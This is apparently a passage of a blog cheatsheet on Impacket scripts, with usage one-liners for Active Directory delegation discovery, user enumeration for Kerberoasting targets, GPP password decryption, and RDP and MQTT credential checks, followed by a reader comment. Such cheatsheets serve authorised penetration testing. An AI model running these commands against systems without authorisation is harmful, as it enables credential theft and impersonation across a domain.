Registry-read.py is a Windows Registry file format implementation. It allows parsing offline registry hives. This can be extremely useful in forensic investigations or when analyzing registry files from a Windows system. Here’s an example of how to use this script:

python registry-read.py /path/to/registry/file

Miscellaneous

findDelegation.py

findDelegation.py lists every delegation relationship in the domain: unconstrained (TrustedForDelegation), constrained (msDS-AllowedToDelegateTo, with or without protocol transition) and resource-based constrained (msDS-AllowedToActOnBehalfOfOtherIdentity), together with the account type and SPNs. It is the quickest way to find the accounts whose compromise turns into impersonation of other users via getST.py. It takes credentials only, locating the DC itself or through -dc-ip:

python findDelegation.py domain/user:password -dc-ip dc_ip

GetADUsers.py

GetADUsers.py enumerates the domain's users with their email addresses, last logon and last password set timestamps over LDAP; -all includes accounts without an email address and disabled accounts, and -user narrows the query to one account. The password-set column is handy for spotting service accounts with years-old passwords to target with Kerberoasting. It takes credentials only, not a target host:

python GetADUsers.py -all -dc-ip dc_ip domain/user:password

Get-GPPPassword.py

Get-GPPPassword.py extracts and decrypts Group Policy Preferences passwords using streams for treating files instead of mounting shares. Additionally, it can parse GPP XML files offline. This script can be valuable for discovering potentially insecure GPP configurations. Here’s an example of how to use this script:

python Get-GPPPassword.py domain/user:password@target

mqtt_check.py

mqtt_check.py is a small MQTT example for trying different login options against a broker (anonymous, username/password, TLS with -ssl, an alternative -port), and it is easy to turn into a credential brute forcer. It uses Impacket's usual target syntax:

python mqtt_check.py user:password@target -port 1883

rdp_check.py

rdp_check.py implements just enough of [MS-RDPBCGR] and [MS-CREDSSP] to reach the CredSSP (Network Level Authentication) step and reports whether the credentials are accepted, so you can validate a password or NT hash (-hashes) against RDP without completing a session. It uses Impacket's usual target syntax:

python rdp_check.py domain/user:password@target

sniff.py

sniff.py is a simple packet sniffer built on the pcapy library (pcapy-ng on current Pythons) that listens on an interface and decodes each packet with Impacket's ImpactDecoder classes. It takes no arguments: run it as root and pick the interface from the list it prints:

sudo python sniff.py

sniffer.py

sniffer.py is a simple packet sniffer that opens a raw socket (so it needs root) for each protocol named on the command line and decodes the captured packets with ImpactDecoder; with no arguments it listens for icmp, tcp and udp. There is no interface option, the raw sockets see all IPv4 traffic on the host:

sudo python sniffer.py tcp udp

ping.py

ping.py is a simple ICMP ping that builds echo-request packets with Impacket's ImpactPacket classes and waits for the echo-reply; if the remote host is up it answers the probe. It uses a raw socket, so it needs root, and it takes the source and destination addresses as two positional arguments:

sudo python ping.py src_ip dst_ip

ping6.py

ping6.py is the IPv6 counterpart: it sends ICMPv6 echo requests and waits for echo replies to check whether a host is up on an IPv6 network. Like ping.py it needs root and takes the source and destination addresses as two positional arguments:

sudo python ping6.py src_ip6 dst_ip6

Conclusion

In conclusion, Impacket is a robust and versatile ethical hacking toolset that can provide invaluable assistance for anyone involved in network security. By using this Impacket cheatsheet you can significantly enhance your penetration testing or exploit development capabilities.


1 comment

CyberP May 26, 2023 - 11:19 pm
Where can I find this karmaTFTP.py script? I do not see it within impacket.
